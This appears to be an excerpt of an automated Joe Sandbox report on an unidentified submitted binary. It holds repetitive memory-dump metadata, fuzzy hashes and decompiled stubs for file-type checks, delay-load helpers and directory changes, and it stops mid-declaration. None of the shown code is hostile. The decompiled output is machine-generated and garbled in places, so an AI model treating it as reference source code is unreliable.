                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: DloadProtectSection
                • String ID:
                • API String ID: 2203082970-0
                • Opcode ID: 7ae5606352c5654ee8558f0e213ff3e5cab150acb03443d8f41b0dfa40367359
                • Instruction ID: 75986362c5b5abf55392c3055f893b183cecc1bd0b2d4b28c330a3a064dfd6b7
                • Opcode Fuzzy Hash: 7ae5606352c5654ee8558f0e213ff3e5cab150acb03443d8f41b0dfa40367359
                • Instruction Fuzzy Hash: 6DD012B01C02F09BD703FBAA99C67553354B325B06F903721F149D54F1DB748480CA2D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003D98BC(void* __ecx) {
                				long _t3;
                
                				if( *(__ecx + 8) != 0xffffffff) {
                					_t3 = GetFileType( *(__ecx + 8)); // executed
                					if(_t3 == 2 || _t3 == 3) {
                						return 1;
                					} else {
                						goto L1;
                					}
                				} else {
                					L1:
                					return 0;
                				}
                			}





                APIs
                • GetFileType.KERNELBASE(000000FF,003D97BE), ref: 003D98C8
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: FileType
                • String ID:
                • API String ID: 3081899298-0
                • Opcode ID: 65af6827cbafee5e85836c6f0503860753c931575008e1d3f406773c00a860f4
                • Instruction ID: 6067307e23907299f49ea03685d94109a2365295556d6a66d0c57301831ab156
                • Opcode Fuzzy Hash: 65af6827cbafee5e85836c6f0503860753c931575008e1d3f406773c00a860f4
                • Instruction Fuzzy Hash: D2C0123640010585CE224A24A8441957751AA537667B98697D028851A1C332CC47FB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EEAE7() {
                
                				E003EE85D(0x40c6cc, 0x433034); // executed
                				goto __eax;
                			}



                0x003eeaf9
                0x003eeb00

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EEAF9
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EE423() {
                
                				E003EE85D(0x40c60c, 0x43304c); // executed
                				goto __eax;
                			}



                0x003ee3fc
                0x003ee403

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE3FC
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EE419() {
                
                				E003EE85D(0x40c60c, 0x433054); // executed
                				goto __eax;
                			}



                0x003ee3fc
                0x003ee403

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE3FC
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EE44B() {
                
                				E003EE85D(0x40c60c, 0x43305c); // executed
                				goto __eax;
                			}



                0x003ee3fc
                0x003ee403

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE3FC
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EE5B1() {
                
                				E003EE85D(0x40c68c, 0x433178); // executed
                				goto __eax;
                			}



                0x003ee580
                0x003ee587

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE580
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EE5A7() {
                
                				E003EE85D(0x40c68c, 0x433174); // executed
                				goto __eax;
                			}



                0x003ee580
                0x003ee587

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE580
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EE593() {
                
                				E003EE85D(0x40c68c, 0x433180); // executed
                				goto __eax;
                			}



                0x003ee580
                0x003ee587

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE580
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE3FC
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE3FC
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE3FC
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE3FC
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE3FC
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE3FC
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE580
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE580
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE580
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 1870fa2287861b027800a0cf6fb181b307b1dd0f01c37e40f7a15a4d6bcd3157
                • Instruction ID: 2200e6e2311fa0b685929cd2dd8c723d6d67682226e8738de9c35bd1fa5be420
                • Opcode Fuzzy Hash: 1870fa2287861b027800a0cf6fb181b307b1dd0f01c37e40f7a15a4d6bcd3157
                • Instruction Fuzzy Hash: 6FA011C22A80A2BCB00A23A22C02C3B020CC0C2F203308B2EF822888C0A88008082830
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E003D9F09(void* __ecx) {
                				int _t2;
                
                				_t2 = SetEndOfFile( *(__ecx + 8)); // executed
                				asm("sbb al, al");
                				return  ~(_t2 - 1) + 1;
                			}





                APIs
                • SetEndOfFile.KERNELBASE(?,003D903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 003D9F0C
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: File
                • String ID:
                • API String ID: 749574446-0
                • Opcode ID: d4b331cc0c1bbdf5f7f03888f749857b97e5b09210dd64dd5f98b8a6ca9ba3fa
                • Instruction ID: 784228f315b7b0154c9e5d020a296f20e182772ce46ac43ecad42653612848c3
                • Opcode Fuzzy Hash: d4b331cc0c1bbdf5f7f03888f749857b97e5b09210dd64dd5f98b8a6ca9ba3fa
                • Instruction Fuzzy Hash: CFA0113008000A8ACE002B30CA0800E3B20EB22BC230002A8A00ACA0A2CB22880B8A00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EAC04(WCHAR* _a4) {
                				signed int _t4;
                
                				_t4 = SetCurrentDirectoryW(_a4); // executed
                				return _t4 & 0xffffff00 | _t4 != 0x00000000;
                			}





                APIs
                • SetCurrentDirectoryW.KERNELBASE(?,003EAE72,C:\Users\user\Desktop,00000000,0041946A,00000006), ref: 003EAC08
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: CurrentDirectory
                • String ID:
                • API String ID: 1611563598-0
                • Opcode ID: ee6d355ffda9211a9c5be4b4827f124ddbeaac5aa56aec7ed672e50b6279a943
                • Instruction ID: 31c08101c8af87142b8001b3e26932ed196065616d10c4e22563c40f38dced06
                • Opcode Fuzzy Hash: ee6d355ffda9211a9c5be4b4827f124ddbeaac5aa56aec7ed672e50b6279a943
                • Instruction Fuzzy Hash: 71A011302002008BC2000F328F0AA0EBAAAAFA2B02F00C038A080A8030CB30C820AA08
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 70%
                			E003EC220(void* __ecx, void* __edx, void* __eflags, char _a4, short _a8, char _a12, short _a108, short _a112, char _a192, char _a212, struct _WIN32_FIND_DATAW _a288, signed char _a304, signed char _a308, struct _FILETIME _a332, intOrPtr _a340, intOrPtr _a344, short _a884, short _a896, short _a900, int _a1904, char _a1924, int _a1928, short _a2596, short _a2616, char _a2628, char _a2640, struct HWND__* _a6740, intOrPtr _a6744, signed short _a6748, intOrPtr _a6752) {
                				struct _FILETIME _v0;
                				struct _SYSTEMTIME _v12;
                				struct _SYSTEMTIME _v16;
                				struct _FILETIME _v24;
                				void* _t74;
                				void* _t137;
                				long _t138;
                				void* _t142;
                				void* _t143;
                				void* _t144;
                				void* _t145;
                				void* _t146;
                				signed short _t148;
                				void* _t149;
                				void* _t150;
                				intOrPtr _t152;
                				signed int _t153;
                				signed int _t157;
                				struct HWND__* _t158;
                				intOrPtr _t159;
                				void* _t160;
                				int _t162;
                				int _t165;
                				void* _t168;
                				void* _t170;
                
                				_t156 = __edx;
                				E003EEC50(0x1a50);
                				_t148 = _a6748;
                				_t159 = _a6744;
                				_t158 = _a6740;
